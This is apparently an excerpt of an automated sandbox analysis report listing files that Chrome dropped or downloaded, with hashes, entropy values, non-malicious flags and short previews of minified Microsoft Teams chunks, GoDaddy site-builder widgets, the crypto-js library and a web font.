                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3971)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4079
                                                                                                                                                                                                                          Entropy (8bit):5.303593149178301
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:AKyq75bqlUMjMzjy6YRQE5qQEPJbP2pGO63:ZVbIYH9QEPJbP2oR3
                                                                                                                                                                                                                          MD5:FF7BA3DED0CB6CDE2FDD7CC73AD36CC7
                                                                                                                                                                                                                          SHA1:7329F5FD2EF53DEC8220DB9CA69C7A058E8B4386
                                                                                                                                                                                                                          SHA-256:5B6C65EE1CC693700CF933136ED47345604718427FFAD38D638166DA4217E964
                                                                                                                                                                                                                          SHA-512:482AE7DF2909AE55250DB8EEAAA95B7FA92968802AF6C972C910BED2830B958813CBB263E73EDA6CC4AB27C3236D4BED8ECF8C4CA94F01FF0F8CCA0D36749A65
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981746],{987867:(e,n)=>{function t(e,n){var t=e.length;e.push(n);e:for(;0<t;){var a=t-1>>>1,r=e[a];if(!(0<i(r,n)))break e;e[a]=n,e[t]=r,t=a}}function a(e){return 0===e.length?null:e[0]}function r(e){if(0===e.length)return null;var n=e[0],t=e.pop();if(t!==n){e[0]=t;e:for(var a=0,r=e.length,l=r>>>1;a<l;){var u=2*(a+1)-1,o=e[u],s=u+1,c=e[s];if(0>i(o,t))s<r&&0>i(c,o)?(e[a]=c,e[s]=t,a=s):(e[a]=o,e[u]=t,a=u);else{if(!(s<r&&0>i(c,t)))break e;e[a]=c,e[s]=t,a=s}}}return n}function i(e,n){var t=e.sortIndex-n.sortIndex;return 0!==t?t:e.id-n.id}if("object"==typeof performance&&"function"==typeof performance.now){var l=performance;n.unstable_now=function(){return l.now()}}else{var u=Date,o=u.now();n.unstable_now=function(){return u.now()-o}}var s=[],c=[],f=1,b=null,p=3,d=!1,v=!1,y=!1,_="function"==typeof setTimeout?setTimeout:null,m="function"==typeof clearTimeout?clearTimeout:null,h="und
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (13834)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):13891
                                                                                                                                                                                                                          Entropy (8bit):4.645788246161265
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:49+DrRmRAiyq602NNTV0afQQYrAJ9wzkENGWHl2JBpfodMjHJv8k9fopl1jn:4Bp49ykE8WQs2Vv8k9fGTjn
                                                                                                                                                                                                                          MD5:C7B1DBB0EEF8600D5F57536998855E4D
                                                                                                                                                                                                                          SHA1:03908243C34D5A373ACBA694EB16E30F088B4F7D
                                                                                                                                                                                                                          SHA-256:53DA7DD341F1EF0C484A7B56A17D86669287DA5D082AAA8A0AF04FD3816B6631
                                                                                                                                                                                                                          SHA-512:56EE4961F4C03A15C79252AD9C3CAD93573AC785881541EA32F83389996F4E8C074FBC397FF9F0B218121A3D8E1A9CEF101D088B4BCFB2353D6A311D5F60DCBA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-modernThinRound-ced97fbd.js",["exports"],(function(e){"use strict";const a=(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M5.643 19.241a.782.782 0 0 1-.634-.889c.317-2.142 1.62-4.188 3.525-5.244l.459-.254-.39-.352a4.89 4.89 0 0 1-.797-6.327 4.747 4.747 0 0 1 2.752-2.003 4.894 4.894 0 0 1 6.092 5.72c-.211 1.042-.802 1.97-1.59 2.683l-.308.28.459.253c1.876 1.04 3.185 3.131 3.53 5.26a.765.765 0 0 1-.742.883c-.367.005-.697-.25-.753-.613-.52-3.384-4.067-6.087-7.702-4.324-1.628.79-2.714 2.511-3.014 4.313a.76.76 0 0 1-.887.614zm2.873-10.36a3.36 3.36 0 0 0 3.356 3.355A3.36 3.36 0 0 0 15.23 8.88a3.361 3.361 0 0 0-3.358-3.357A3.36 3.36 0 0 0 8.516 8.88z"});var l={__proto__:null,account:a,person:a,magGlass:(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M19.504 18.461a.76.76 0 0 1 0 1.038.652.652 0 0 1-.956 0L15.2 15.993a6.142 6.142 0 0 1-3.83 1.353C7.858 17.346 5 14.353 5 10.673 5 6.994 7.858 4 11.371 4c3.513 0 6.371 2.994
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):48316
                                                                                                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):272033
                                                                                                                                                                                                                          Entropy (8bit):5.56289564964125
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:wu8IUu85pdmSO5TZTKUTn9TnwOTn9TnAp9elHvpdmSO3iTIT7JlDnDQj3jPNIzSK:5jNUfn2Y34xf1VXMoa
                                                                                                                                                                                                                          MD5:02F83EF51E6FDABE908DAF8A5488E15B
                                                                                                                                                                                                                          SHA1:7CE763E13894827694E511F4BBD2A96766550BEC
                                                                                                                                                                                                                          SHA-256:6CADC80D115050C4852901C13F89A631D7B324AF65479E2EF06438F6AFD0408D
                                                                                                                                                                                                                          SHA-512:1B8094F64AFEB883ED45919750CD5461F3AAEA4F51F2FAFD9D7344648F651CF4AC492C4113939F22A2E9814CC29086AAE2A3B4FE0F258877F7B740EF24E1AE43
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-index3-355e6d9f.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-index3-355e6d9f.js",["radpack","exports","~/c/bs-_rollupPluginBabelHelpers","~/c/bs-overlayTypes","~/c/bs-index2","~/c/bs-index","~/c/bs-dataAids","@wsb/guac-widget-shared@^1/lib/components/ColorSwatch","@wsb/guac-widget-shared@^1/lib/components/Carousel","~/c/bs-navigationDrawer","~/c/bs-searchFormLocations","@wsb/guac-widget-shared@^1/lib/components/DynamicFontScaler"],(function(e,t,a,r,o,l,n,i,c,s,g,p){"use strict";class u extends((global.Core||guac["@wsb/guac-widget-core"]).UX2.utils.createElement("Background")){}a._(u,"propTypes",{className:(global.PropTypes||guac["prop-types"]).string,backgroundSize:(global.PropTypes||guac["prop-types"]).string,backgroundPosition:(global.PropTypes||guac["prop-types"]).string,style:(global.PropTypes||guac["prop-types"]).object,imageData:(global.PropTypes||guac["prop-types"]).object,mobileWidthMultiplier:(global.PropTypes||guac["prop-types"]).number,desktopWidthMultiplier:(global.PropTypes||guac["prop-types"]).number,blu
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16154)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):16297
                                                                                                                                                                                                                          Entropy (8bit):4.821418491177051
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:ys3Ja7t6zrFoOcsyB1w4saUut7gGQed7iLOy9XUWKVm/Zm2Z3Wy7TQDvi5hxXM/S:ySa7uKBpvcNAVMZ79ya
                                                                                                                                                                                                                          MD5:A9DD685A1BA04CBAAF4867C75277DD73
                                                                                                                                                                                                                          SHA1:8245BACA5CE8A257BE39458F62D2887ADA0D2189
                                                                                                                                                                                                                          SHA-256:2A717E15DDD479995D43BAAB1DBCE48FCAFCF3F66F0AC723CC7A9FB605A40958
                                                                                                                                                                                                                          SHA-512:B1686892FB4970EF78E41476FFB5A17B588804952E6AF5E5531BD127F6E65A40C4E4FB5C322B6455DEAC22C22A194643B22F713B5BF66245E1C46C0A4162C263
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/premium-benefits-locale-en-us-48b16b68f7171ef7.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78047],{890679:(e,t,i)=>{i.r(t),i.d(t,{default:()=>a});const a={namespace:"premiumBenefits",locale:"en-us",translations:{current_plan_names:"{{planName1}} & {{planName2}}",current_plan_title:"Your free benefits",discover_try_buy_60_days_trial:"60-day trial, no card required",discover_try_buy_60_days_trial_exp:"Free 60-day trial, subject to eligibility",discover_try_buy_banner_count_down_mf:"{count, plural, =0 {You have # days left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} =1 {You have # day left in your Teams Premium trial. Get the most out of premium features like AI-powered recaps, advanced meeting protection, and extra event engagement tools. <0>View all your benefits</0>} other {You have # days left in your Teams Premium trial. Get
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):101278
                                                                                                                                                                                                                          Entropy (8bit):5.180843417705069
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:0MP300ZdOxmeQtfUUY4jWSW+Xdl5zy7PInz3wxg:0MP300ZdOxmeQtfUyjWSW+t3y7PInz33
                                                                                                                                                                                                                          MD5:F6E56D3FEFD068CFA45ECC1A5A8361D2
                                                                                                                                                                                                                          SHA1:5788DCDE05A9F50570F3E5C2A8D7DEB273B62C7D
                                                                                                                                                                                                                          SHA-256:3D82A80E9E6B79FE1AC58517995E09A973B981F150A15FE2C19473FA26D6C78D
                                                                                                                                                                                                                          SHA-512:DF088AC1E6A4D5B61968178C8510562130DEB3C1754C7C58AE7017A5945E248C2AD1D3F6DB4A78BE216E4CA188D6736DF51BD2447ED929BF3E14A75FDAFC628B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/299770-19f9009717d80418.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[299770],{638283:(e,t,r)=>{r.d(t,{$:()=>n,V:()=>a});var n,o=r(709183),i=r(623374);!function(e){e[e.Error=0]="Error",e[e.Warning=1]="Warning",e[e.Info=2]="Info",e[e.Verbose=3]="Verbose"}(n||(n={}));var a=function(){function e(e,t){void 0===t&&(t={}),this.level=n.Info;var r=t.correlationId,o=void 0===r?"":r,i=t.level,a=void 0===i?n.Info:i,s=t.piiLoggingEnabled,c=void 0!==s&&s;this.localCallback=e,this.correlationId=o,this.level=a,this.piiLoggingEnabled=c}return e.prototype.logMessage=function(e,t,r){if(!(e>this.level||!this.piiLoggingEnabled&&r)){var a,s=(new Date).toUTCString();a=o.$.isEmpty(this.correlationId)?s+":"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t:s+":"+this.correlationId+"-"+i.r+"-"+n[e]+(r?"-pii":"")+" "+t,this.executeCallback(e,a,r)}},e.prototype.executeCallback=function(e,t,r){this.localCallback&&this.localCallback(e,t,r)},e.prototype.error=function(e){this.logMessage(n.E
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19745)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):19853
                                                                                                                                                                                                                          Entropy (8bit):5.604146717589645
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:k5XMmHcOq7SbYI8N7RS7DYA5V6VdK08ImVk5jbdMT5nzhnJZcx8YyPUTqTM:KcmHcOq7SbYIS7+DYIAvK08c5tMFzhnA
                                                                                                                                                                                                                          MD5:78A705D92C0694D70744B816B2B49760
                                                                                                                                                                                                                          SHA1:B2D77A384EAB594BD872DF93CB3F5060CE0A0E4D
                                                                                                                                                                                                                          SHA-256:27D82842A7E0AEBBABF594098A8EF642883A2D4AE1FD4B35A33CC0D319BCA222
                                                                                                                                                                                                                          SHA-512:7B965924CA77EEB6D6C485E6601EA11EA3FC9D7AAE4C203B6B4023DE4C0B7D4D81A7745ACB80524E43483313D0B716AEEC483E563A7C94ED9B94F347618A8E22
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/478644-057a172734e2511c.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[478644],{792529:(e,a,t)=>{t.d(a,{e:()=>w});var i=t(513432),n=t(644525),r=t(854130);var o=t(411947),l=t(164093),f=t(250452),s=t(264278);const u=/[\(\[\{][^\)\]\}]*[\)\]\}]/g,d=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,c=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,p=/\s+/g,m=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\u3040-\u309F\u30A0-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF]|[\uD840-\uD869][\uDC00-\uDED6]/;function b(e,a,t){return e?(e=function(e){return(e=(e=(e=e.replace(u,"")).replace(d,"")).replace(p," ")).trim()}(e),m.test(e)||!(null==t?void 0:t.allowPhoneInitials)&&c.test(e)?"":function(e,a,t){let i="";const n=e.split(" ");return 0!==n.length&&(i+=n[0].charAt(0).toUpperCase()),t||(2===n.length?i+=n[1].charAt(0).toUpperCase():3===n.length&&(i+=n[2].charAt(0).toUpperCase())),a&&i.length>1?i.charAt(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23774)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):23882
                                                                                                                                                                                                                          Entropy (8bit):5.153711856234183
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:xbvNzuDNDJcODNAlioqeB7qNSjnLOkQmGX+g2P/TaZcWZmwrbYMd7svY9YF1vrQO:xbvNzsNDJcODNAlioqeB7qNSVzg2P/uA
                                                                                                                                                                                                                          MD5:0F68D77488B13B60694FF8865D2C5137
                                                                                                                                                                                                                          SHA1:3ABAC8DA7DABDB841331647945C2F7A7AE360FB1
                                                                                                                                                                                                                          SHA-256:9E94D7F6787D2D9CD3E2CBEA298E4C57E6BE6AB73B09BCF7EE3BE4926786E7DF
                                                                                                                                                                                                                          SHA-512:AAD953A529250E1E9D7F41B67758E0F96B1E84B1A25561B3CDA938732C0BD87AC45260D8E7F8898DD668536F46EA597E6F15FFD63F021846E1B7D4A40BE1A969
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/662908-71da5000e4ef5f3f.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[662908],{662908:(e,t,r)=>{r.d(t,{hY:()=>C,dL:()=>P,Xy:()=>M,Rs:()=>H,Fr:()=>U});var n=r(364819),i=r(332752),a=r(802756),s=r(258376),o=r(334499),l=r(175640),c=r(710639);const d=()=>new o.b("div",{});const p=new class{constructor(e={}){this._options={},this.plugins=[],this.nodeError={value:!1,message:""},this.ASTDom=[d()],this.result=[],this._parser=new c.Parser(this,e)}get options(){return this._options}get lastNode(){return this.ASTDom[this.ASTDom.length-1]}onopentag(e,t){const r=new o.b(e,t),n=this.plugins.length;if(n){for(let e=0;e<n;e++){const t=this.plugins[e].exec(this.ASTDom);if(this.nodeError={value:t.error,message:t.errorMessage},this.nodeError.value)break}if(this.nodeError.value)return void this._parser.parseComplete(this.nodeError.message)}this.integrateToAST(r),this.ASTDom.push(r)}ontext(e){if(/\r?\n/.test(e)&&""===e.trim())return;const t=new s.S(e);if(this.lastNod
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1191)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1299
                                                                                                                                                                                                                          Entropy (8bit):5.243624236595786
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38TMvCam+7wybSqkIozwVDhytW67C7Q42Q/KTozNKSk/qRpat4vQi6yIkY1:wp3sp3eM3Rthu7yQ4okqqbaMQi6yIdln
                                                                                                                                                                                                                          MD5:C9F2D980F1163B95B19052E4A5CE0ABE
                                                                                                                                                                                                                          SHA1:B5EFC49E29265B2AB334F1DFDAA43D6593C189CC
                                                                                                                                                                                                                          SHA-256:ED681F88CD569BE8A4779582EA93900F349DB64DC6F34811A70A26A4314AF8CC
                                                                                                                                                                                                                          SHA-512:260BD1EC7DDB69468C8D21A7F8065110AF032759F966E7FA5BB07193BF9EDBBA6ECD606961831C543DEC4086E36E5FF35FA38DB7BEF624AFE58D4E92295720E9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224316],{224316:(e,a,t)=>{t.d(a,{C:()=>r});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),i=t(829289),r=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svgFlippingInRtl},s.createElement("path",{className:n()(i.Q.outline,a.outlinePart),d:"M7.64582 4.14708C7.84073 3.95147 8.15731 3.9509 8.35292 4.14582L13.8374 9.6108C14.0531 9.82574 14.0531 10.1751 13.8374 10.39L8.35292 15.855C8.15731 16.0499 7.84073 16.0493 7.64582 15.8537C7.4509 15.6581 7.45147 15.3415 7.64708 15.1466L12.8117 10.0004L7.64708 4.85418C7.45147 4.65927 7.4509 4.34269 7.64582 4.14708Z"}),s.createElement("path",{className:n()(i.Q.filled,a.filledPart),d:"M7.73271 4.20694C8.03263 3.92125 8.50737 3.93279 8.79306 4.23271L13.7944 9.48318C14.0703 9.77285 14.0703 10.2281 13.7944 10.5178L8.79306 15.7682C8.50737 16.0681 8.03263 1
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):226512
                                                                                                                                                                                                                          Entropy (8bit):5.1293074718332825
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:4xnKeBqX6yuDTgb5W6ob04md1hDTyPRd5/xTLq0FdhsB74x1gE:45Tgbt4AhDTyPRd5c0FdhS74/Z
                                                                                                                                                                                                                          MD5:7432938A0C516DA8C09F4209F6A939C0
                                                                                                                                                                                                                          SHA1:15AEA8D8D7B1DA5339558EFF080699F07A98305E
                                                                                                                                                                                                                          SHA-256:47E6318DBF2E691516871C436C796A158B0005A36AE366F8CD5B3110D3038914
                                                                                                                                                                                                                          SHA-512:D089DDFF6277CF0FA62E1762688EE72D4AC7202471E6DCC4E53F421A8358367C0B65530DE0B94CF0E885F3EF484B88EE2E414A02A22366A303A320FD3438F8F0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[917004],{122454:(e,t,a)=>{var n;a.d(t,{A:()=>c});var i=new Uint8Array(16);function o(){if(!n&&!(n="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto)))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return n(i)}const r=/^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i;const _=function(e){return"string"==typeof e&&r.test(e)};for(var s=[],l=0;l<256;++l)s.push((l+256).toString(16).substr(1));const d=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,a=(s[e[t+0]]+s[e[t+1]]+s[e[t+2]]+s[e[t+3]]+"-"+s[e[t+4]]+s[e[t+5]]+"-"+s[e[t+6]]+s[e[t+7]]+"-"+s[e[t+8]]+s[e[t+9]]+"-
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17293)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):17439
                                                                                                                                                                                                                          Entropy (8bit):4.674826440745112
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:nwZwQX75Bb3yaqArKvqY7hH0jO6Rt/plXnFA:nuX75Bb3yaqArQ/7OThE
                                                                                                                                                                                                                          MD5:32500496CD7503B6D650FF336EA3A383
                                                                                                                                                                                                                          SHA1:84D86AA0BE87503F1804D774C711BC35DBE90480
                                                                                                                                                                                                                          SHA-256:B490DDFA1BE69AEB2E879639151ED665646C2F421D5804160E29F17DE4ACC468
                                                                                                                                                                                                                          SHA-512:D2E40CF661255EACE6B16BD7A8F02A9B28A6F42958B6771F07661DE318200149EAC1BF62F65BA95153013F19B6EF0630D5A9B4382749F04379BA013FF7284513
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/meeting-collaboration-locale-en-us-d9e2dc9f4ac289ee.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[62600],{629050:(e,t,o)=>{o.r(t),o.d(t,{default:()=>i});const i={namespace:"meetingCollaboration",locale:"en-us",translations:{ai_disclosure_text:"AI-generated content may be incorrect",ai_generated_notes:"AI-generated notes",ai_generated_notes_copilot_only_mode:"AI-generated notes aren't available in this meeting",ai_generated_notes_description:"AI takes notes for everyone during the meeting. Transcription also starts.",ai_generated_notes_stopped_banner_description:"AI-generated notes have stopped because transcription or recording was turned off.",ai_generated_notes_title:"AI-generated notes",ai_generated_notes_unlicensed_turn_off_description:"If you turn this off, you won't be able to turn it back on.",ai_generated_notes_unlicensed_turn_on_description:"You don't have permissions to turn this on.",ai_generated_text_in_copy_to_clipboard:"AI-generated content. Be sure to check
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 28064, version 1.0
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):28064
                                                                                                                                                                                                                          Entropy (8bit):7.991068124157429
                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                          SSDEEP:768:qsC450QIzQAEnVaAA7ZPTtMthdXPRfD4opg+:kQaQAEnNgZG1P7g+
                                                                                                                                                                                                                          MD5:314D6364BBEE6681D0B2364EE3555E2E
                                                                                                                                                                                                                          SHA1:C5AAB803ABE36BF664D7B7E2A3731CD849337006
                                                                                                                                                                                                                          SHA-256:5A42C91E1ECC9B09346A1520D9A6F98074C13EEBFB1CC87C4E82E5992BEB685B
                                                                                                                                                                                                                          SHA-512:96E07238F144F8B88E621A21F22A10F1B496FBB75B374F4A76BFA14120E7D458BC4CF62B093D237506CD1695C266C7B0F481C8E869392B67A5E4EE87303FE6D4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/gfonts/s/quicksand/v31/6xKtdSZaM9iE8KbpRA_hK1QN.woff2
                                                                                                                                                                                                                          Preview:wOF2......m...........m/..........................8..&..,?HVAR.X.`?STATf..&/V...........(.0..*.6.$..L. .....j.....%lW3z.*d.......v.v...;.I5.....9Bf.z..Z.j..a.c...Z(s..h.k...0.#..P[C....#.AF.DCG.A..{k...OyF...p,.....u..6.....t....VD.k....3......J(.....u..t..~n.Q.E.;7..1<.............z.A.H.$J?.L.?Q...h..Q..-.F.ba4...`.cN.$Cl.P!...OW.....H.%l;3..m.e....=..._.....T......P..L...M...Z.PqJ)&.".o.!..Y..>.vv"f....9Q....IM......".4...y..a.n...;.....d...3f.. .H..o.b_O.Kx"b.{.ZO*ia.:..S].........;@W(.[g.!...8.d .?.b.5@.'....i.5.!)..zp...^b....6.r...{.#..M....-...(...$.$k.....X.kt...CH.x.........PP....m...n9..._.+[C..1r[.Y.......v...Q.N...}..>..]n......ds,...G..w.Ly.2.....Q2vh.!..#j...v.@..*u.:....+......B.&w..dX,...=.D.....~..B..4Z.L....Brj.K..R.R.^..l}.$SFg.c.....=..r.).M.....xY!;.3kW..;.{d?A.m.....J.$K.....9.\..%3'.}......G......(:,....eU..$.M.....6._s.........$*U).-.&k.U.B...j..5l kY..P.......\5..Kr...............b@pou.V....av...F..?.Rk.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (15028)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):15136
                                                                                                                                                                                                                          Entropy (8bit):5.353622533370098
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:+M4Z8nM9h4znlRz1sG0TevRuBL7rJSZYziKCZiM4ND5x6tbeUIEhj:+M4j8zjz1sG0TevgBL7lSZYziZoM4Nby
                                                                                                                                                                                                                          MD5:6079A78034C6177D22105DF67701A845
                                                                                                                                                                                                                          SHA1:BBED8DA8D6A18783CD50DF12F63020D283DCA746
                                                                                                                                                                                                                          SHA-256:30530BB045C4F2C89D9AE2A71977804251E888C737B783DD068630713803A38F
                                                                                                                                                                                                                          SHA-512:C29659B41F17D032BD70086B4D03EA12686B19F430F4656C35E69AAE8604F913C12F093CF3351CBCABF667EAEE580BC096D2FA8346C310398EB4F9AFD8E7FF6E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
